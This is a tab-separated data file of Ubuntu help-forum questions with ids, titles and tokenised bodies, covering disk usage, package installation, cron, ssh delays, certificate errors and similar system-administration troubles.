490715	problem with full partition on / and raid	i 'm in sort of bug with my root partition taking 100 % i try to mount the / partition on a new folder /tmp/2ndroot/ to make a correct du without /home and other folder mounted , and it seems the system continue to count my remote /media folder : sudo du -- max-depth=1 -h /tmp/2ndroot | sort -nk1 1,1g /tmp/2ndroot/var 1,5m /tmp/2ndroot/root 3,5m /tmp/2ndroot/lib32 4,0k /tmp/2ndroot/home 4,0k /tmp/2ndroot/lib64 4,0k /tmp/2ndroot/mnt 4,0k /tmp/2ndroot/proc 4,0k /tmp/2ndroot/run 4,0k /tmp/2ndroot/srv 4,0k /tmp/2ndroot/sys 8,0k /tmp/2ndroot/dev 11g /tmp/2ndroot/usr 11m /tmp/2ndroot/bin 13m /tmp/2ndroot/sbin 16k /tmp/2ndroot/lost+found 24k /tmp/2ndroot/tmp 42g /tmp/2ndroot/media 54g /tmp/2ndroot 69m /tmp/2ndroot/etc 93m /tmp/2ndroot/boot 571m /tmp/2ndroot/opt 649m /tmp/2ndroot/lib sudo du -- max-depth=1 -h /tmp/2ndroot/media | sort -nk1 4,0k /tmp/2ndroot/media/38109d261f16b878 4,0k /tmp/2ndroot/media/cdrom 4,0k /tmp/2ndroot/media/download 4,0k /tmp/2ndroot/media/films 4,0k /tmp/2ndroot/media/music 4,0k /tmp/2ndroot/media/serie 8,0k /tmp/2ndroot/media/srey 42g /tmp/2ndroot/media 42g /tmp/2ndroot/media/backup sudo df sys . de fichiers blocks de 1k utilisé disponible uti % monté sur /dev/mapper/isw_cjffbfddic_array6 57546428 56617376 0 100 % / none 4 0 4 0 % /sys/fs/cgroup udev 4038684 4 4038680 1 % /dev tmpfs 809920 1332 808588 1 % /run none 5120 0 5120 0 % /run/lock none 4049588 76784 3972804 2 % /run/shm none 102400 56 102344 1 % /run/user overflow 1024 1024 0 100 % /tmp /dev/mapper/isw_cjffbfddic_array7 177304484 149091576 19183260 89 % /home /dev/mmcblk0p1 3909632 3865920 43712 99 % /media/srey/5c7f-60cc as you can see my media folder is empty because it correspond to remote and local folder , as you can see my fstab : http : //bib.unthinkingdepths.fr/seb/pdf /home/srey/travaux/these/pdf_remote davfs rw , user , noauto , 0 0 192.168.0.10 : /volume1/backup/spin /media/backup nfs nouser , tcp , atime , auto , rw , dev , exec , suid 0 0 192.168.0.10 : /volume2/music /media/music nfs nouser , tcp , atime , auto , rw , dev , exec , suid 0 0 192.168.0.10 : /volume2/download /media/download nfs nouser , tcp , atime , auto , rw , dev , exec , suid 0 0 192.168.0.10 : /volume2/films /media/films nfs nouser , tcp , atime , auto , rw , dev , exec , suid 0 0 192.168.0.10 : /volume2/video /media/serie nfs nouser , tcp , atime , auto , rw , dev , exec , suid 0 0 /dev/mapper/isw_cjffbfddic_array5 /media/38109d261f16b878 ntfs-3g defaults , nosuid , nodev , locale=fr_fr.utf8 0 0 /dev/mapper/isw_cjffbfddic_array6 / ext4 errors=remount-ro 0 1 /dev/mapper/isw_cjffbfddic_array7 /home ext4 defaults 0 2 /dev/mapper/isw_cjffbfddic_array8 none swap sw 0 0 a df -i sys . de fichiers inœuds iutil . ilibre iuti % monté sur /dev/mapper/isw_cjffbfddic_array6 3662848 906637 2756211 25 % / none 1012397 2 1012395 1 % /sys/fs/cgroup udev 1009671 566 1009105 1 % /dev tmpfs 1012397 651 1011746 1 % /run none 1012397 3 1012394 1 % /run/lock none 1012397 90 1012307 1 % /run/shm none 1012397 30 1012367 1 % /run/user overflow 1012397 24 1012373 1 % /tmp /dev/mapper/isw_cjffbfddic_array7 11272192 963862 10308330 9 % /home /dev/mmcblk0p1 0 0 0 - /media/srey/5c7f-60cc
490720	unable to install grace	i have ubuntu version 11.10 and i am unable to install grace from the software centre . i tried with the tar file as well but after ./configure it does not run the command make . how do i resolve this ?
490721	how to install a deb package with dependencies on something you have multiple versions of ?	i want to install a deb package that depends on python 3.4 , which i have , however the installer thinks i only have 3.2 since that 's apt-cache says , and dpkg-query returns python3 3.2.3-0ubuntu1.2 . update-alternatives did n't seem to cut it . what can i do ?
490722	start-stop-daemon keeps editing my shebang making it impossible to run	start-stop-daemon -- name flaskserver -- start -- chuid root -- exec /root/worker/start.sh start.sh clearly has this line # ! /usr/bin but after i run above , it results in ! /usr/bin and of course it will complain that it ca n't run it due to exec format error why is it doing this and how can i make it run the .sh without touching it ?
490725	set the screen brightness on startup	on ubuntu 14.04 i tried to dim the screen brightness to 50 % on each system start in /etc/rc.local with the line xbacklight -set 50 % right before the line exit 0 why does this not work ? is there a better solution ?
490728	will `` full upgrade to ubuntu studio '' harm unity ?	i want to install ubuntu studio as a desktop alongside my unity and the other environments . what exactly does `` fully upgrade '' mean ? will it remove or affect unity ? if yes ; how ? i just want to have both .
490730	xampp running but not showing up properly	hi all i installed xamp some days before . but it just disappeared later on i found it in : /opt/lampp $ so i started it as : $ sudo ./xampp start and in terminal it showed : starting xampp for linux 1.8.3-2 ... xampp : starting apache ... ok. xampp : starting mysql ... ok. xampp : starting proftpd ... ok. that means it is running now but when i tried localhost i found nothing moreover when i tried to open graphical panel with : $ sudo ./xampp panel or $ sudo ./xampp start panel in first case nothing happened just warnings , in second case it started xamp as usual can i ask you how to open graphical panel and moreover it happens with me that nothing shows up after i have installed a software where did it go i never come to know . thank you p.s : while adding tags i found xampp and xamp . are they different ?
490731	ssh remote commands very slow after migrating from 12.10 to 14.04 on ec2	i had a number of 12.10 machines running on ec2 and provisioned them using scripts built around : ssh scp rsync now i have replaced most of my 12.10 machines with 14.04 machine and am finding that my provisioning scripts now run prohibitively slowly whilst executing the same remote commands . an example of a remote command being used is : ssh -o stricthostkeychecking=no -o batchmode=yes -p22 -i /users/.ssh/ec2_key.pem ubuntu @ ec2-xxx-xxx-xxx-xxx.compute-1.amazonaws.com `` sudo /etc/init.d/redis-server status '' this will execute very quickly on my 12.10 machines , maximum 3 seconds delay , however the same command on the 14.04 machines can take upwards of 60 seconds . does anyone know what the problem is ? watching the machine through htop whilst running a remote command indicates that the problem is somehow related to the message of the day :
490732	how do i start conky when ubuntu starts up ?	i 'm using ubuntu 12.04 and installed the conky system monitor , and start it with the conky command . i added this code on startup-applications but nothing works . how do i start conky when my ubuntu starts up ? is it possible to start multiple conky themes on startup ?
490734	cryptsetup with optimized aes version	i am trying to set up an encrypted partition with dm-crypt and luks . i want to use the version of the aes cipher optimized with assembly instructions . i recompiled my kernel and added the required configuration options , but now both ciphers show up with the same name in /proc/crypto , and i am confused which one should i use with cryptsetup to have it working . both aes-generic and aes-asm show up in /proc/crypto under the same name aes : name : aes driver : aes-asm module : kernel priority : 200 refcnt : 2 selftest : passed type : cipher blocksize : 16 min keysize : 16 max keysize : 32 name : aes driver : aes-generic module : kernel priority : 100 refcnt : 1 selftest : passed type : cipher blocksize : 16 min keysize : 16 max keysize : 32 thanks
490735	ubuntu os hanged stage	i am using ubuntu and some times it is going to hanged stage while running 2 or more webapps simultaneously . is there any way similar alt+ctrl+delete to task manager in windows for sudden terminations ?
490740	nagios nrpe dameon check_nrpe plugin missing	i installed nagios nrpe on a remote machine from ubuntu repository sudo apt-get install nagios-nrpe-server , and plugins with : sudo apt-get install nagios-plugins-basic nagios-plugins nagios-plugins-extra after the installation , check_nrpe is missing in /usr/lib/nagios/plugins . how could i resolve this problem ? i 'm really new to this nagios .
490741	problem in configuring oracle 11g	i am trying to install oracle 11g.but , i am unable to configure /etc/init.d/oracle-xe configure getting like below root @ madhu-lenovo-g500 : /home/madhu # sudo /etc/init.d/oracle-xe configure root @ madhu-lenovo-g500 : /home/madhu # i did n't get any configurations can any one help me ?
490742	ubuntu login issue	i am in great login issue in ubuntu 14.04. in order to reduce bootup time i commented out default-display-manager text file as a root user found in directory /etc/x11/default-display-manager so that i 'd be able to login in cli mode but after rebooting i 'm not getting the login screen . what do i do now ?
490743	why the php statement `` require '' shows in the browser the content of the php file after upgrading my ubuntu server from 10.04 to 14.04 ? [ solved ]	in my old web server everything worked properly . after upgrading to ubuntu 14.04 , the php statement `` require '' displays in the browser the content of the php file pointed , instead of read it and load it . so far , i have n't found out what is the problem . first , i thought the include_path were wrong , however is the same in both servers . i have compared the php_version ( ) results and i ca n't see what 's wrong in the new server settings . can anyone help me ? what other information is needed to explain my problem ? thanks
490744	nagios nrpe check_nrpe : socket timeout after 10 seconds	getting following error on nagios server root @ vmb : /usr/local/nagios/libexec # ./check_nrpe -h 54.255.1.99 -n check_nrpe : socket timeout after 10 seconds .
490746	sudo is also user login password - why ? how to change ?	when installing ubuntu i can create a user with an encrypted folder , what i always do . now after the installation the login password for this user is also the sudo password . is that how it should be ? i actually would like to have a different user login and sudo password , does is make sense ? should i do that , how ?
490749	how to compile and install ia32-libs in ubuntu 14.04 ?	how can i compile and install the package ia32-libs in ubuntu 14.04 ?
490756	is there an alternative to pulseaudio ?	i 've experienced many problems with pulseaudio one of which my bluetooth headphone never works properly after it wakes from the idle mode if there are no sounds for a while . i even tried to go to /etc/pulse/ and comment out the line load-module module-suspend-on-idle in the file named default.pa as suggested by someone here . but even though this partially fixed my headphone issue , i got microphone issues instead . is there an alternative to pulseaudio ? if yes , how to install and use it ?
490757	change my keyboard layout for my profile only	we are using ubuntu-server 14.04 , i want to change the keboard layout to querty only for my login , i want the other users remain having azerty , i know that i have to put a command line in some statup file , i am looking which file and where is this file and what is the command , thanks
490761	how to only accept e-mail from a single ip address	i am sure this is a simple question but i 've been googling for days now and am not making much progress , forgive me if this has been asked previously . i 'm new to linux and am still getting to grips with the basics , but am beginning to get a feel for things . i have postfix 2.11 installed as an mta . we receive mail from a smarthost to our router , redirect all incoming port 25 traffic to postfix where amavis and spamassassin do their work , then send it on to our exchange box . this all works perfectly . however , i notice in the mail.log file that the vast majority of spam does not come from the smarthost , it 's received directly by postfix from the internet . the smarthost always uses the same ip address . is there a way i can tell postfix to only accept incoming mail from this single ip address and reject everything else , or are there risks involved in this that i 'm not seeing ?
490762	hp probook 4740s - win8 oem + ubuntu 14.04	is it even possible to install ubuntu 14.04 alongside win8 oem on this laptop ? when i set uefi hybrid and disable safeboot i'am able to boot from dvd with ubuntu , and install , but i have n't found a way to boot to grub ( grub2 ) . only win starts . here are options from my bios ( efi ? ) settings : http : //pl.tinypic.com/view.php ? pic=2rxb0ps & s=8 # .u7pp9fhhi6i which one could be for booting to linux ? i tried using easybsd - it seems to work , and adds an option to win bootmanager , but selecting linux ends with restart and an error just after it ... http : //pl.tinypic.com/view.php ? pic=10gd3eu & s=8 # .u7pqsvhhi6i please , help ! would downgrading to win7 ( or install win8 box ) in legacy mode be an option for me ?
490763	add/edit line text in file without open editor ( linux command )	i know how to add new text to a file , but how can i edit it ? example : adding hello_world = 1 to test.txt using the following command : echo `` hello_world = 1 '' > > test.txt but how can i change 1 to 0 or something else ?
490766	what kernel does ubuntu studio 14.04 use ?	is it the `` rt kernel '' , the `` lowlatency kernel '' or the `` realtime kernel '' ? i ca n't find any source that specifies ( weird ! ) . however some sources say that in 13.10 the used kernel was the lowlatency kernel . is it the same for 14.04 ?
490769	install haroopad correctly from tar.gz	before you mark this as a duplicate of how do i install a .tar.gz ( or .tar.bz2 ) file ? hear me out first . i downloaded the haroopad-v0.12.0_i386.tar.gz file from the haroopad website and extracted the archive expecting to find the normal .make or install.sh files but they were not there , instead there were two more archives - 'control.tar.gz ' and 'data.tar.gz ' . i extracted both of them and below is the file tree . ( i ommited the .icons tree structure from data.tar.gz because they are just icons ) . control.tar.gz : ├── control └── postinst data.tar.gz : └── usr ├── bin │ └── haroopad └── share ├── applications │ ├── haroopad.desktop │ └── mimeapps.list ├── doc │ ├── changelog │ └── copyright ├── haroopad │ ├── haroopad < -- -- -- -- -- -- - │ ├── libraries │ ├── nw.pak │ └── resources │ └── themes │ ├── editor │ │ └── default.css │ └── viewer │ └── default.css └── icons i can get haroopad to run by double clicking the haroopad file ( shown above with an arrow ) but am sure there must be a better way to 'install ' it . i think i should copy these files somewhere - like the 'haroopad.desktop ' i suppose should go to '~/.local/share/applications ' , but i 'm not so sure . how do i install this archive correctly in such a way that i can run it from the dash and terminal ?
490770	upload a new firebird version into the repository . how ?	we use 25 ubuntu 12.04.4 lts servers at our company with firebird databases . in this release firebird 2.5.1 is the latest version . is there any chance somebody will update it to 2.5.2 ? we need this version , but our policy is to deny usage of a 3rd party repo or build it from source . so the only way is the official update . how can i help or ask for this change ?
490780	install ubuntu 14.04 on my dell inspiron 15r laptop	i am using laptop , dell inspiron-15r , which has windows 8 already installed . i have 3 partitions named c , d , f . ( total 750gb ) . windows 8 is installed in the c drive . i created some unused space by shrinking the existing drives , and tried to install ubuntu 14.04 to the unused space as per the tutorial . but ubuntu tries to unmount my existing ntfs windows partitions . how can i install ubuntu 14.04 ( 64bit ) in unused space and keep my windows partitions ?
490784	repartition hard drive	i installed zorin os8 with ubuntu 14.04 . this automatically partitioned the hard drive , one partition for each os . i have since deleted the zorin install , and want to get back the space it took on the hard drive for the ubuntu install . can i do this by reinstalling ubuntu ?
490789	`` connection is untrusted `` error in firefox	i have downloaded ubuntu 14.04 and i have tried it ( without installing it ) . i connected to the internet via dsl and i tried to surf . when i tried to go to an https : // site , it showed me the error message `` this connection is untrusted '' with the following technical details ( for example ) : mail.google.com uses an invalid security certificate . the certificate is not trusted because no issuer chain was provided . ( error code : sec_error_unknown_issuer ) this also happens in chrome and the browser of ubuntu , but it does n't happen in windows . edit - my certificate ( when trying login to gmail ( on 6 july ) ) : accounts.google.com identity : accounts.google.com verified by : www.netspark.com expires : 09/02/2014 subject name c ( country ) : us st ( state ) : california l ( locality ) : mountain view o ( organization ) : google inc cn ( common name ) : accounts.google.com issuer name c ( country ) : us st ( state ) : new york l ( locality ) : new york o ( organization ) : netspark ou ( organizational unit ) : netspark development cn ( common name ) : www.netspark.com email ( email address ) : support @ netspark.com issued certificate version : 3 serial number : 5d bb b0 22 36 a8 00 00 not valid before : 2014-06-04 not valid after : 2014-09-02 certificate fingerprints sha1 : 4d 5b c4 64 a0 9b 81 10 4e 73 ca 6c 25 81 fa d6 6c 91 1c 1a md5 : b0 87 85 f2 77 8c dc e3 e8 88 60 01 aa 54 50 78 public key info key algorithm : rsa key parameters : 05 00 key size : 1024 key sha1 fingerprint : 7c 55 41 de c3 ff c0 21 8d 46 96 b4 17 c0 f4 ef df 45 07 d2 public key : 30 81 89 02 81 81 00 c9 d7 1c a2 7a d4 db 46 04 1f d8 e0 94 6d c2 28 0f cf 3a b8 b7 72 bb a8 60 cc 1a dd 6b 23 f8 5c e4 53 60 4f f5 2c e1 0e c7 c4 f3 1e cb a1 93 b3 2d bc b4 4f 85 5e c4 50 1f 68 5d 98 5a 1e 97 d8 83 53 93 97 7f c0 c7 e5 f4 b6 99 bb cd 01 74 9b 63 0e 09 40 9f bd b0 68 d2 cd e8 f7 68 19 6e ee 99 bc 35 52 8f 50 b5 aa 2e e3 68 47 6a a4 f3 9b ed 2c c1 6f 6b da fd af 6c 1d 1f 76 dc cc 69 61 02 03 01 00 01 extended key usage allowed purposes : server authentication client authentication critical : no subject alternative names dns : accounts.google.com critical : no basic constraints certificate authority : no max path length : unlimited critical : yes signature signature algorithm : sha1 with rsa signature parameters : 05 00 signature : 71 1c 02 a7 e2 f7 7f 83 88 7a e9 63 38 56 8b ac d0 11 05 ae 14 77 36 76 4c fe ba 49 52 d9 70 d9 5b 93 6b af 6d e5 8d d4 9a 3c a3 3c 05 90 c5 e3 1f 09 05 5e 92 1a a5 8d 70 23 6a 38 b2 c0 31 c0 e5 30 60 1d e4 38 00 2a 65 f6 2c 4b 13 5d 16 96 e2 8e 2e d0 dc 23 89 d4 6e ca a9 e8 04 24 a6 1c db 1c 31 80 d9 28 94 ad 6f 55 5c 81 32 2f 2a fa 69 7c e4 f7 fb 8f 62 7b d7 ee c4 eb cc fb 9c db why does this happen ? how can i solve it ?
490794	how to permanently set path in ubuntu 14.04lts	i executed . export path=/home/varun/software/molden/molden5.1 : $ path in my terminal ; followed by which molden i get the expected output : /home/varun/software/molden/molden5.1/molden but this is temporary . when i close my terminal which molden does not give me any response . what should i do ? please help me .
490796	very high iowait times	i have a large system - 128gb , a couple of raid0 filesystems ( 6tb and 2tb ) with an ssd cache , 8 cores ( 16 with hyperthreading ) , running ubuntu 12.04 64bit . when i try to write a large file i get very poor performance , and iotop shows processes waiting over 99 % in iowait : dd if=/dev/zero of=lezz bs=1024 count= $ ( ( 1024*50 ) ) 51200+0 records in 51200+0 records out 52428800 bytes ( 52 mb ) copied , 3.74852 s , 14.0 mb/s from iotop : total disk read : 185.92 k/s | total disk write : 84.06 m/s tid prio user disk read disk write swapin io command 24481 be/4 arris292 0.00 b/s 0.00 b/s 0.00 % 99.99 % dd if=/dev/zero of=lezz bs=1024 count=512000 22668 be/4 root 0.00 b/s 0.00 b/s 0.00 % 99.99 % [ flush-252:0 ] 21532 be/4 root 0.00 b/s 0.00 b/s 0.00 % 99.99 % [ kworker/1:2 ] 1 be/4 root 0.00 b/s 0.00 b/s 0.00 % 0.00 % init 2 be/4 root 0.00 b/s 0.00 b/s 0.00 % 0.00 % [ kthreadd ] 3 be/4 root 0.00 b/s 0.00 b/s 0.00 % 0.00 % [ ksoftirqd/0 ] 8196 be/4 arris292 0.00 b/s 0.00 b/s 0.00 % 0.00 % sshd : arris292 @ pts/22 5 be/4 root 0.00 b/s 0.00 b/s 0.00 % 0.00 % [ kworker/u:0 ] 6 rt/4 root 0.00 b/s 0.00 b/s 0.00 % 0.00 % [ migration/0 ] 7 rt/4 root 0.00 b/s 0.00 b/s 0.00 % 0.00 % [ watchdog/0 ] on a very similar system ( same memory , same model , similar filesystem ) i get the expected performance and no processes waiting 99 % of their time for io ... . dd if=/dev/zero of=lezz bs=1024 count= $ ( ( 1024*50 ) ) 51200+0 records in 51200+0 records out 52428800 bytes ( 52 mb ) copied , 0.111191 s , 472 mb/s i 've seen this before but i 've never really been able to get to the bottom of the problem , and as the day goes on and more engineers start using this system to build , the overall performance will drop to a crawl . so what could be causing the incredibly high io wait times ? how can i troubleshoot this further ? is it possibly an ssd or disk problem , and if so , what tools can i use to diagnose ?
490800	check if ntp client daemon is working properly using ntpdc	how can i check if a ntp client is working properly solely by using ntpdc command ? thanks
490801	how do i install ubuntu 14.04 without losing data on a windows 7 pc ( physically ) ?	i have this windows pc , and i want to install this ubuntu physically without vmware . last time i installed this , i lost up-to 160gb , and it was all of my hard drive . i have 4 drives c : , d : , f : and e : . ( on my new hdd with 320gb ) where as i had like this on my 160gb too . but it was totally wasted because all the movies , videos , images and datas were removed and the whole harddrive were formatted and was partitioned into one drive . i want to install this ubuntu os by not losing any of these drives , and not losing any of the datas that i have right now ( no partition , no removal and no formatting ) . but i ca n't figure out how to . last time i did physical install was on 160gb hdd , and i lost all my datas . i do n't wan na lose data on this new one . the os was 13 , now it 's ubuntu 14.04 . also , will i be able to hear sounds after installing ubuntu physically without even installing sound card ( audio decoder installed ) ?
490802	redirecting my mail server to another domain	i am not really familiar with linux , that 's why my questions might seem to be very easy for you . currently i have a mail server on ubuntu 12.04 ( using postfix ) and roundcube for web access , so our customers have their e-mails on that server ( ex : client1 @ myserve.com ) and the domain name is mail.myserve.com ( ip 10.1.1.2 ) . our web site is www.myserve.com ( ip 10.1.1.1 ) also hosted on an ubuntu 12.04 server . now we have registered a new domain , and our website will be www.myserve2.com and i am not sure of what i have to do for the mail server and the website . here are my questions : how to redirect the web site access to be routed to the new domain ( ex : someone type www.myserve.com and get directly to www.myserve2.com ) , and is it possible that both domain can use the same ip address ? ( 10.1.1.1 ) ? which file do i have to modify ? what will happen to the mail server ( mail.myserve.com ) ? will it directly become mail.myserve2.com ? if not how can i change this without disturbing our clients ? can both mail servers use the same ip address ( 10.1.1.2 ) ? what change do i have to do in postfix to allow users to continue using their mail services without changing their e-mail addresses ? will they have to change their e-mail addresses to client1 @ myserve2.com ? thank you very much in advance
490804	how to get the package versions corresponding to unity 7 launcher applications ?	i 'd like to know the ubuntu package version of all applications locked into my unity ( 7 ) launcher from the command line . the command should return a list of packages names and their versions , filtering applications manually installed ( like makemkv in my case ) .
490810	how can i setup a network lexmark ms812dn ?	i have installed the drivers but i do n't know how to setup the printer itself to actually print something . do i have to plug an ethernet cable to the laptop or to a network connection ? which address should i put in ?
490813	audio flicking at back port	in my ubuntu 14.04 32-bit system , whenever i connect speaker at back audio port of my system the audio is flicker ( in case when volume is 100 % of both system volume and application volume that playing audio e.g . music player ) . and when volume decrease somewhat , 60 % or less it 's stop flicking . but on front port is not happening , it working fine ? and in sound setting there is flicking like shown in image , it continuously changing from analog output and headphone and vice versa . that cause audio flicking . and output of cat /proc/asound/cards 0 [ generic ] : hda-intel - hd-audio generic hd-audio generic at 0xfeb44000 irq 43 1 [ generic_1 ] : hda-intel - hd-audio generic hd-audio generic at 0xfeb40000 irq 16 is back port is defected or something else ?
490814	error starting python file using cron	i 'm trying to get a python file to run every 2 mins , i 'm using the following cron command but the script never runs . would anyone know what the possible errors could be related to starting a python file using cron.. ? */2 * * * * /git/project/tags/python scrape.py
490816	stuck on loading screen after install displaylink driver	i am not sure if this is a bug or not , i just want a fix for this or revert what i had done . i have a fresh 12.04lts ubuntu , and then i tried to install displaylink driver by running apt-get install xserver-xorg-video-displaylink however , when i restart my machine , it will get stuck in the ubuntu logo with five orange dots . i have reinstall ubuntu 4 , 5 times and eveytime after i install this package , i will get stuck . i need this package because i have to get my 2nd displaylink usb monitor work ( it keep getting a green screen only.. ) is there anyway i can recover from that easily , the fix i have is to reinstall ubuntu from cd every time , but this takes so long . i have spent whole day doing this , install - > updates - > install displaylink - > hang thank you very much !
490820	how to make ubuntu 14.04 a kiosk	i have made a clean install of ubuntu 14.04 lts desktop and now want 's to convert it into a kiosk with a full screen webbrowser . this was previously done in 10.04 and worked perfect , but due to hardware changes ( graphics ) we are forced to use version 14.04 . i have created a kiosk.desktop in /usr/share/xsessions and a shell script called kiosk.sh that launches firefox with r-kiosk installed . the shell script is executable . a user called `` kiosk '' is set to autologin ( in /etc/lightdm/lightdm.conf ) . but now i 'm stuck . i 'm want the kiosk.sh to be run when the kiosk user session is started . in previous versions this could be done in the gui tool `` login screen settings '' or in /usr/share/lightdm/lightdm.conf.d/50-ubuntu.conf . i have changed 50-ubuntu.conf to `` user-session=kiosk '' but it does n't start . the `` login screen settings '' tool ca n't be found . has it been replaced by another utility in 14.04 ? placing a kiosk.sh.desktop in ~/kiosk/.config/autostart works , but the gnome-desktop is shown before firefox starts in fullscreen mode making it possible for the users to interact with the desktop . what is to correct/best way to start firefox in fullscreen after user autologin ? thanks thomas
490821	publishing open office base	i am using open office recently running on ubuntu os and the problem now is that i have been using microsoft access before which allowed me to publish my database/access online making it easy for everyone to access the database and use it , now using ubuntu and open office i 'm failing to do so , please help me out to be able to run open office base online on my server
490822	resize to full screen with xrandr without blur effect	i have an asus a52jc notebook http : //www.asus.com/notebooks_ultrabooks/a52jc/specifications/ with nvidia geforce 310m and i use it with a 22 '' external monitor philips with 1920x1080 native resolution . btw to work hours and hours , i prefer to use 1600x900 resolution . in my windows 7 box i 'm able to `` resize to full screen '' this resolution without `` blurry '' effect ( through an intel display control panel ) can i do the same with xrandr ? i did several try like xrandr -- ouput vga1 -- scale 1.20x1.20 but final result is always `` blurry '' ubuntu 14.04 lts
490823	ubuntu 14.04 graphical errors after upgrade from 12.04	i was having a few issues that were annoying me with 12.04 , so i decided to upgrade to 14.04 . everything seems to have gone well enough , except that there are graphical errors appearing in the side-bar menu on the left of the screen and menu bar running along the top of the screen ( wifi , power icons etc . ) i can see and open programs from the left menu icons , but if i right click them for the sub-menu , the box that appears is completely garbled ( a bit like the loading screen for an old commodore 64 game or something similar ) . also , if i press the windows key on my keyboard , which previously brought up a run menu , the screen goes crazy with flashing boxes for a few seconds and eventually settles into a garbled menu like the side-bar right clicks . it 's a 32-bit version and i 'm using an amd mobility radeon 4xxx graphics card . if i run echo $ desktop_session i get ubuntu , which from what i understand means gnome 3+unity de . can anyone suggest what i could do to try and fix this ? is there something i should try reinstalling etc . i 'm afraid of making things worse if i start randomly re-installing things without asking for advice from someone more knowledgable . this is what my dash looks like :
490825	touchscreen stopped working after installation - lenovo g400s touch	i tested the live image before installing to make sure the touchscreen was going to work . everything went fine , the installation ends , and after reboot , the touchscreen stopped working . i am running ubuntu gnome 13.10 with gnome 3.10
490829	how can i install chinese fonts on kubuntu 14.04	i 'd like to see chinese characters , such as this one .
490831	why ca n't i update my system via shell script ?	i have a very simple script , let 's call it update.sh : # ! /bin/bash echo `` updating system ... '' sudo apt-get udpate sudo apt-get udgrade running this script , throws the following error : me @ host $ ./update.sh updating system ... e : invalid operation udpate e : invalid operation udgrade this is ubuntu server 14.04 lts x64 . me @ host $ uname -a linux host 3.13.0-30-generic # 54-ubuntu smp mon jun 9 22:45:01 utc 2014 x86_64 x86_64 x86_64 gnu/linux running the command from shell directly works as desired : me @ host $ sudo apt-get update ign http : //some.mirror.ubuntu.com trusty inrelease ign http : //some.mirror.ubuntu.com trusty-updates inrelease hit http : //some.mirror.ubuntu.com trusty release.gpg hit http : //some.mirror.ubuntu.com trusty-updates release.gpg hit http : //some.mirror.ubuntu.com trusty release [ ... ] why is that ? any idea ?
490836	open pwd protected http stream in vlc from cli	can anyone please advise me on how to open a pwd protected http stream from cli in vlc ? i checked out the -- help and man pages , but they seem to offer only syntax for opening ftp , rmt and smb pwd protected streams ( and http-proxy ) , but not http . or there is some walk around solution i am not thinking of ? what i have tried already : cvlc http : //192.168.1.67/videostream.asf ? user=admin & pwd=xxx cvlc http : //user : xxx @ 192.168.1.67/videostream.asf cvlc http : //192.168.1.67/videostream.asf -- http-user 'user ' -- http-pwd 'xxx' may be i can not read the manuals properly but to me the instructions from vlc docs is really difficult to interpret into cli commands : % vlc input_stream -- sout `` # module1 { option1=parameter1 { parameter-option1 } , option 2=parameter2 } : module2 { option1= ... , option2= ... } : ... '' you may also use the following syntax : % vlc input_stream -- sout-module1-option1= ... -- sout-module1-option2= ... -- sout- module2-option1= ... -- sout-module2-option2= ... ... for example , to transcode a stream and send it , use : % vlc input_stream -- sout ' # transcode { options } : standard { options } ' if i have interpreted the manual correctly ( so far i came up with 3 or 4 different options ) , i need module standard , option access= , then item http : , item options user= < user name > and pwd= < password > . all put together should read one of these : vlc http : //192.168.1.67/videostream.asf ' # standard { access=http : user=admin , pwd=xxx } ' vlc http : //192.168.1.67/videostream.asf ' # standard { access=http : user=admin } , http : pwd=xxx } ' vlc http : //192.168.1.67/videostream.asf -- sout-standard-access=http : user=admin ( ok i did not put in the pwd in the last line but vlc did not even pick up the user= as user 's name ... . ) . but nothing works and i do not even get anywhere close to putting it right looking at the output produced . this is really cheeky and noobish but if someone could share a real working sample how that should look like , that would be greatly appreciated . very important - i need a client part of the commands for capturing the stream ... again , if i read the manual correctly , this part : http : streams over http . item options are : user= to enable http basic authentication and set the user , pwd= to set the basic authentication password , mime= to set the mime type returned by the server . is re the server part .
490837	make a usb in ubuntu to boot a macbook air	the title pretty much covers it all , but i want to create a usb drive with ubuntu on it to boot a macbook air . my computer has ubuntu 14.04 on it , and that 's it . how do i do it ?
490842	wine applications have no sound after moving drive_c folder	i moved the drive_c of wine to another partition . now everything is good except sound . wine applications no longer have sound . what 's the problem ? edit : the main problem ( i think ) is that i have deleted all config text files in /home/ [ user-name ] /.wine then wine created new ones .
490844	`` unable to securely remove '/lib/modules/3.11.0-13-generic/build ' : not a directory '' while upgrading the kernel	when i try to upgrade chrome by running google-chrome-stable_curent_i386.deb or if i try to do it through software updater i get get a `` package operation failed - the instalation or removal of a software package failed '' error . these are the details : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 284394 files and directories currently installed . ) removing linux-headers-3.11.0-12-generic ( 3.11.0-12.19 ) ... dpkg : error processing package linux-headers-3.11.0-12-generic ( -- remove ) : unable to securely remove '/usr/src/linux-headers-3.11.0-12-generic/include/config/yenta/ene/tune.h ' : not a directory removing linux-headers-3.11.0-13-generic ( 3.11.0-13.20 ) ... dpkg : error processing package linux-headers-3.11.0-13-generic ( -- remove ) : unable to securely remove '/lib/modules/3.11.0-13-generic/build ' : not a directory removing linux-image-extra-3.11.0-13-generic ( 3.11.0-13.20 ) ... dpkg : error processing package linux-image-extra-3.11.0-13-generic ( -- remove ) : unable to securely remove '/usr/share/doc/linux-image-extra-3.11.0-13-generic/changelog.debian.gz ' : not a directory removing linux-image-3.11.0-13-generic ( 3.11.0-13.20 ) ... dpkg : error processing package linux-image-3.11.0-13-generic ( -- remove ) : unable to securely remove '/lib/modules/3.11.0-13-generic/kernel/lib/ts_fsm.ko ' : not a directory no apport report written because maxreports is reached already errors were encountered while processing : linux-headers-3.11.0-12-generic linux-headers-3.11.0-13-generic linux-image-extra-3.11.0-13-generic linux-image-3.11.0-13-generic error in function : i 've tried the solution posted here but it does n't work . i 've tried option 1 and i get this : nasty @ nasty-vostro-a860 : ~ $ sudo apt-get install 2vard [ sudo ] password for nasty : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package 2vard nasty @ nasty-vostro-a860 : ~ $ sudo apt-get purge grub-common reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : linux-headers-3.13.0-24 linux-headers-3.13.0-24-generic linux-image-3.13.0-24-generic linux-image-extra-3.13.0-24-generic use 'apt-get autoremove ' to remove them . the following packages will be removed : grub-common* 